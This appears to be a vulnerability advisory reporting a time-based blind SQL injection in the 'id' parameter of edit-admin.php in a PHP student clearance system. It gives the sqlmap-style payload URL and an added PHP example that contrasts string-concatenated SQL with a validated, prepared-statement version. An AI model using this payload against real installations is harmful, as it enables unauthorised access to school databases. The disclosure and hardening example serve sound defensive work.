Web-Based Student Clearance System is vulnerable to SQL Injection (edit-admin.php)
URL: /Admin/edit-admin.php
The URI parameter ‘id’ is vulnerable.
Line 32 of edit-admin.php invokes a SQL query built with input that comes from an untrusted source. This call could allow an attacker to modify the statement’s meaning or to execute arbitrary SQL commands.
Parameter: #1* (URI)
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: http://127.0.0.1:80/student_clearance_system_Aurthur_Javis/admin/edit-admin.php?id=5' AND (SELECT 2846 FROM (SELECT(SLEEP(5)))sOPo) AND 'uvpP'='uvpP
Download Code:
https://www.sourcecodester.com/php/15627/web-based-student-clearance-system.html
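
The pattern described for line 32, shown beside a hardened form, as an added example that is not the project's own code. The `admin` table, its columns and the function names are hypothetical, and an in-memory SQLite database stands in for the application's MySQL database so the script runs offline.

```php
<?php
// Added example: hypothetical schema, not taken from edit-admin.php.
$pdo = new PDO('sqlite::memory:');
$pdo->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
$pdo->exec('CREATE TABLE admin (id INTEGER PRIMARY KEY, username TEXT)');
$pdo->exec("INSERT INTO admin (id, username) VALUES (5, 'constructed-admin')");

// Vulnerable pattern: the request value is concatenated into the SQL text,
// so quotes inside it end the string literal and the rest is parsed as SQL.
function build_query_unsafe(string $rawId): string
{
    return "SELECT * FROM admin WHERE id='" . $rawId . "'";
}

// Hardened pattern: accept only a positive integer, then bind it as a
// parameter so the value can never change the statement's structure.
function fetch_admin(PDO $pdo, string $rawId): ?array
{
    $id = filter_var($rawId, FILTER_VALIDATE_INT, ['options' => ['min_range' => 1]]);
    if ($id === false) {
        return null; // rejected before any statement is prepared
    }
    $stmt = $pdo->prepare('SELECT id, username FROM admin WHERE id = :id');
    $stmt->bindValue(':id', $id, PDO::PARAM_INT);
    $stmt->execute();
    $row = $stmt->fetch(PDO::FETCH_ASSOC);
    return $row === false ? null : $row;
}

// The value of 'id' from the payload reported above.
$reported = "5' AND (SELECT 2846 FROM (SELECT(SLEEP(5)))sOPo) AND 'uvpP'='uvpP";

// Unsafe builder: print the statement text the database would receive.
echo build_query_unsafe($reported), PHP_EOL;

// Hardened lookup: a legitimate id returns the row, the reported value is refused.
var_dump(fetch_admin($pdo, '5'));
var_dump(fetch_admin($pdo, $reported));
```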